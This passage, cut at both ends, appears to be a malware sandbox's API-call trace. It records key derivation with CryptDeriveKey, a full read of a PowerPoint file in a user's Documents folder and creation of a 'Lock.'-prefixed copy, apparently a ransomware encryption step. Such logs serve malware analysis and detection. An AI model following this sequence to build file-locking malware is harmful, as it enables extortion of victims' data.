wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.927] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.927] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaba70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.927] CryptDeriveKey (in: hProv=0xa7c220, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0215.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.928] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.928] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.928] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.928] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7120, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.928] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0215.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.929] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/lmvGT20EAt7X97ts9.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lmvgt20eat7x97ts9.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.929] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.929] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.930] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0215.930] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38548a8 [0215.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.931] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38548a8 | out: hHeap=0x2af0000) returned 1 [0215.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0215.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0215.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.lmvGT20EAt7X97ts9.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.lmvgt20eat7x97ts9.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0215.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0215.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0215.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ea020 [0215.936] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.937] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.939] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x688a, lpOverlapped=0x0) returned 1 [0215.940] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1688a) returned 0x2a8a138 [0215.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ea020 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1688a) returned 0x2aae878 [0215.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1688a) returned 0x2ac5110 [0215.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac5110 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0215.947] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0215.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1688a) returned 0x2ac5110 [0215.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaeb8 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1688a) returned 0x2a8a138 [0215.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 